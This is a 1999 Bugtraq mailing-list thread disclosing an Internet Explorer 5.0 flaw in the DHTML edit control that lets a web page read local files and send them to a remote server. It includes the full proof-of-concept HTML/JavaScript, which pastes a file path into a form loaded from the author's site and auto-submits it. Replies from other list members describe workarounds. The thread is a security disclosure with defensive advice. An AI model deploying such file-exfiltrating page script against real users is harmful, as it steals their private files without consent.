Date: Tue, 30 Mar 1999 19:35:16 +0300
From: Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@netspace.org
Subject: IE 5.0 allows reading and sending local files to a remote server

There is a security bug in Internet Explorer 5.0, which allows reading
and
sending local files to a remote server.
The problem is a bug in the DHTML edit control, which allows pasting a
filename in a FILE object. When the form is submitted via JavaScript,
the
contents of the file are sent to a remote server.

Demonstration is available at: http://www.nat.bg/~joro/fr.html

Workaround: Disable JavaScript

I would like to thank Juan Cuartango
(http://pages.whowhere.com/computers/cuartangojc/index.html) for his IE
exploits,
which helped me a lot for discovering this vulnerability!

Regards,
Georgi Guninski
http://www.nat.bg/~joro

-------------------------------------------------------------------------

[http://www.nat.bg/~joro/fr.html]

<HTML><HEAD><TITLE>IE 5.0 file reading</TITLE>
</HEAD>
<BODY>
There is a bug in Internet Explorer 5.0 which allows reading and sending local files.
<BR>
The file name must be known.
<BR>
Thanks to Juan Cuartango for his exploits, which helped me a lot for discovering this vulnerability!
<BR>
Written by <A HREF="http://www.nat.bg/~joro">Georgi Guninski</A>
<BR>
Workaround: Disable JavaScript
<BR>
<BR>
<INPUT TYPE=TEXT ID=A1 VALUE="C:\TEST.TXT">

<SCRIPT>

function f1()
{


document.all.A1.select();
document.execCommand("copy");

dh.DOM.forms(0).elements(0).focus();
dh.execCommand(5032);
setTimeout("dh.DOM.forms(0).submit();",1000);



}

function f()
{
alert("Create a file C:\\test.txt and it will be read and shown in another window \n You may need to wait some time");
dh.loadURL("http://www.nat.bg/~joro/form3.html");
setTimeout("f1()",2000);
}

setTimeout("f();",1000);

</SCRIPT>




<OBJECT classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A height=100 id=dh 
width=700>
</OBJECT>


</BODY>
</HTML>

-------------------------------------------------------------------------

Date: Wed, 31 Mar 1999 09:14:47 +0100
From: Andrew Tulloch <frohicky@TECHNOLOGIST.COM>
To: BUGTRAQ@netspace.org
Subject: Re: IE 5.0 allows reading and sending local files to a remote server


If you look under scripting options in security settings there is the option
"Allow paste via script" simply turning this to disabled provides this
result:

<paste>
See the contents of your file among the other stuff
----------------------------------------------------------------------------
----
-----------------------------7cf26c3b6a8 Content-Disposition: form-data;
name = "a"; filename="" Content-Type:
application/octet-stream -----------------------------7cf26c3b6a8--
</paste>

which as far as I see has disabled the reading of local files and is a
little less drastic than disabling all JavaScript.

Regards,

Andrew Tulloch

-------------------------------------------------------------------------

Date: Wed, 31 Mar 1999 14:05:21 -0800
From: "Stephen Purpura (MSFDC-JV)" <v-spurpu@MICROSOFT.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: IE 5.0 allows reading and sending local files to a remote server

There is another workaround.  In IE5, if you use the "built in" feature to
limit scripted paste operations then the problem doesn't seem to manifest.

Try the following and goto the sample implementation:

Tools menu --> Internet options --> security tab --> custom level --> allow
paste operations via script = prompt or disable


Stephen